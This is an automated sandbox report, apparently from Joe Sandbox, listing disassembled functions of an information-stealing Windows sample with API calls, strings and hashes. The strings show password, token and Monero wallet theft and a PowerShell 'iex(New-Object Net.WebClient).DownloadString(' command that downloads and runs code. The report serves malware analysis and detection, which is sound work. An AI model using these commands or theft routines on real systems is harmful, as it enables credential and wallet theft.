                          • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                          • Opcode Fuzzy Hash: ab3784fe0b46da7b28e8c10d9ea5d0b529e82314f904c2f6f7e079643bbd3618
                          • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0040733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00407452
                          • HeapFree.KERNEL32(00000000), ref: 00407459
                          • task.LIBCPMTD ref: 00407555
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                          • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                          • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                          • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0040BC9F
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0040BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0040BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                          • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                          • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                          • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                          • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                          • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                          • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404FD1
                          • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00405041
                          • InternetCloseHandle.WININET(?), ref: 004050B9
                          • InternetCloseHandle.WININET(?), ref: 004050C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 4fd2a467fd6bf3e29bd82fd8903457f740f93c8251a9d339e881c6e44e43cf95
                          • Instruction ID: b99e9efde984867735bda927bde45e9de8b03a596fe48837239c4182617af08d
                          • Opcode Fuzzy Hash: 4fd2a467fd6bf3e29bd82fd8903457f740f93c8251a9d339e881c6e44e43cf95
                          • Instruction Fuzzy Hash: AD3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9E609B7281C7746AC58F99
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                          • wsprintfA.USER32 ref: 00418459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0128DAA8,00000000,000F003F,?,00000400), ref: 004184EC
                          • lstrlen.KERNEL32(?), ref: 00418501
                          • RegQueryValueExA.ADVAPI32(00000000,0128D8B0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                          • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                          • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                          • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004176AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0127B7E0,00000000,00020119,00000000), ref: 004176DD
                          • RegQueryValueExA.ADVAPI32(00000000,0128D940,00000000,00000000,?,000000FF), ref: 004176FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                          • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                          • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                          • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0041773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0127B7E0,00000000,00020119,004176B9), ref: 0041775B
                          • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                          • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                          • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                          • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                          • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                          APIs
                          • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                          • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                          • CloseHandle.KERNEL32(000000FF), ref: 00419327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :A$:A
                          • API String ID: 1378416451-1974578005
                          • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                          • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                          • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                          • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                          • LocalFree.KERNEL32(0040148F), ref: 00409A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                          • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                          • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                          • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                          APIs
                          • lstrcat.KERNEL32(?,0128DC88), ref: 004147DB
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00414801
                          • lstrcat.KERNEL32(?,?), ref: 00414820
                          • lstrcat.KERNEL32(?,?), ref: 00414834
                          • lstrcat.KERNEL32(?,0127B2C0), ref: 00414847
                          • lstrcat.KERNEL32(?,?), ref: 0041485B
                          • lstrcat.KERNEL32(?,0128D058), ref: 0041486F
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00401B54,?,?,0042564C,?,?,00420E1F), ref: 00418D9F
                            • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                            • Part of subcall function 00414570: RtlAllocateHeap.NTDLL(00000000), ref: 00414587
                            • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                            • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                          • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                          • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                          • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                          Strings
                          • ')", xrefs: 00412CB3
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                          • <, xrefs: 00412D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: a0ed4cbfe93d0cc974da6044f8369c0878916f44a8cf608972f3da16a68e91da
                          • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                          • Opcode Fuzzy Hash: a0ed4cbfe93d0cc974da6044f8369c0878916f44a8cf608972f3da16a68e91da
                          • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
